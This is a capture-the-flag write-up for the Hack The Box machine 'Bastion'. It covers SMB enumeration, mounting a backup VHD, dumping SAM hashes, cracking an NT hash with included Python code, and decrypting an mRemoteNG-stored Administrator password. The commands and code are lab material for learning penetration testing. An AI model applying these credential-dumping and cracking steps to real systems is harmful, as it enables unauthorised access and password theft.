Hack the box: Bastion
- 28 November 2019
- Notes

Introduction
Target: 10.10.10.134 (Windows)
Kali: 10.10.16.65
In conclusion, Bastion is not a medium box, but it is not an especially easy machine either. It would be easier to solve with a Windows VM; Commando VM is a good choice for this box, but it can also be finished from Kali.
Enumeration
First, detect the open ports:
# Nmap 7.70 scan initiated Sun May 5 12:33:32 2019 as: nmap -sT -p- --min-rate 10000 -oN ports 10.10.10.134
Warning: 10.10.10.134 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.134
Host is up (0.33s latency).
Not shown: 60653 closed ports, 4873 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
From the open ports we can infer that this is a Windows machine with an SSH service exposed. Next, try to obtain the detailed services behind these open ports:
# Nmap 7.70 scan initiated Sun May 5 12:29:46 2019 as: nmap -A -oN services 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.53s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/5%OT=22%CT=1%CU=37821%PV=Y%DS=2%DC=T%G=Y%TM=5CCED772
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F4%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=A)
OS:SEQ(SP=F3%GCD=1%ISR=10A%TI=I%CI=I%TS=A)OPS(O1=M54BNW8ST11%O2=M54BNW8ST11
OS:%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W1=2000%W
OS:2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54BNW
OS:8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0
OS:%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4
OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -43m13s, deviation: 1h09m14s, median: -3m15s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-05-05T14:27:12+02:00
| smb-security-mode:
|   account_used: guest
|   authent
Exploitation
Nothing above looks special. On a typical box the HTTP service is the entry point; on this one we should pay attention to the SMB service on port 445 (on Windows machines, port 445 is often the entry point). For SMB enumeration on Kali we can use smbmap, smbclient, enum4linux, etc. Let's try smbclient first:
smbclient -L 10.10.10.134

With smbclient we can list this box's SMB shares without any password. Try to access each share with smbclient //10.10.10.134/sharename. The other shares cannot be accessed; only Backups can.

Access the Backups share with smbclient //10.10.10.134/Backups:

There is a note.txt in the share:
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
This is indeed a hint for something useful in the exploitation. Accessing files with smbclient is inconvenient because you cannot browse them directly, so mount the shared folder on Kali:
mount -t cifs //10.10.10.134/Backups -o user=guest,password= /mnt/backups

Now we can access the files directly. It looks like a backup folder. After some exploration, we find some interesting files.

The VHD (virtual hard disk) files look the most interesting. According to Wikipedia, VHD is a file format which represents a virtual hard disk drive (HDD). It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. It is typically used as the hard disk of a virtual machine. So we may find more interesting contents in the VHD files. There are two VHD files, one of 37M and the other of 5.1G; the larger one looks the more promising. Downloading the whole VHD would be far too slow, especially on this network, and the box author has said in the forum that you do not need to download it. Instead, mount the VHD file directly on Kali:
guestmount --add "/mnt/backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/vhd
This operation can take a while if the network is unstable. Once it completes, the VHD is mounted. It appears to be an OS disk, and nothing looks special at first glance, but it contains a SAM file. The Security Account Manager (SAM) is the Windows database file that stores local user account passwords, as hashes. Try to access the SAM file; samdump2 can be used to dump the hashes from it.


From the dumped hashes, the hash of L4mpje looks useful. We can use the online hash-cracking site HashKiller to crack it.
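As an added example (not part of the original write-up), this Python shows why a hash dumped from the backup SAM can simply be looked up on a site like HashKiller: the NT hash is unsalted MD4 over the UTF-16LE password, so a leaked hash can be compared directly against candidate passwords or a precomputed table. The sample hash is constructed (it is the NT hash of "password"), not L4mpje's real hash.

```python
# Added example (not from the original write-up). NT hashes are unsalted MD4 over the
# UTF-16LE password, so a hash lifted from a backup SAM can be matched offline against
# a wordlist or a precomputed table, which is what HashKiller does. MD4 is written in
# pure Python because OpenSSL 3 builds of hashlib often ship without it.
import struct

_MASK = 0xFFFFFFFF
_R3_ORDER = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)
    while len(msg) % 64 != 56:          # pad to 56 bytes mod 64
        msg.append(0)
    msg += struct.pack("<Q", bit_len)   # 64-bit little-endian length in bits
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for rnd in range(3):
            for i in range(16):
                if rnd == 0:    # round 1: F = (b & c) | (~b & d)
                    f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
                elif rnd == 1:  # round 2: G = majority of b, c, d
                    f, k, s, add = (b & c) | (b & d) | (c & d), (i % 4) * 4 + i // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
                else:           # round 3: H = parity of b, c, d
                    f, k, s, add = b ^ c ^ d, _R3_ORDER[i], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
                a, b, c, d = d, _rotl((a + f + x[k] + add) & _MASK, s), b, c
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE password, with no salt."""
    return md4(password.encode("utf-16-le")).hex()

def crack_nt_hash(target_hex: str, candidates):
    """Return the first candidate whose NT hash equals target_hex, else None."""
    target = target_hex.lower()
    for pw in candidates:
        if nt_hash(pw) == target:
            return pw
    return None

# Constructed sample: the NT hash of "password" (the real L4mpje hash is not reproduced here).
LEAKED_HASH = "8846f7eaee8fb117ad06bdd830b7586c"
```

Because there is no salt, every account that uses the same password shares the same NT hash, which is why a single leaked SAM in a backup image is enough for a lookup attack and why backup images deserve the same protection as the live system.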

We cracked it easily. Since we know from the initial enumeration that the box exposes an SSH service, try to log in over SSH as user L4mpje. Luckily, we are in.

Privilege escalation
After logging in as L4mpje, we find that our permissions are quite limited. Privilege escalation is often achieved through a vulnerability in some specific installed software, so it is worth checking which programs are installed on the box.

We find an interesting folder, mRemoteNG. It is an open source remote connections management tool. It had a problem: the stored connection credentials can be recovered from its config files. For this box, someone has created a tool to crack the password in this config file. The config file is stored in the AppData folder.


It seems that the Administrator password is stored in the XML file. Someone has created mremoteng-decrypt to recover the password; it is very convenient thanks to their awesome work.
java -jar decipher_mremoteng.jar "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Finally, we get the password of Administrator.
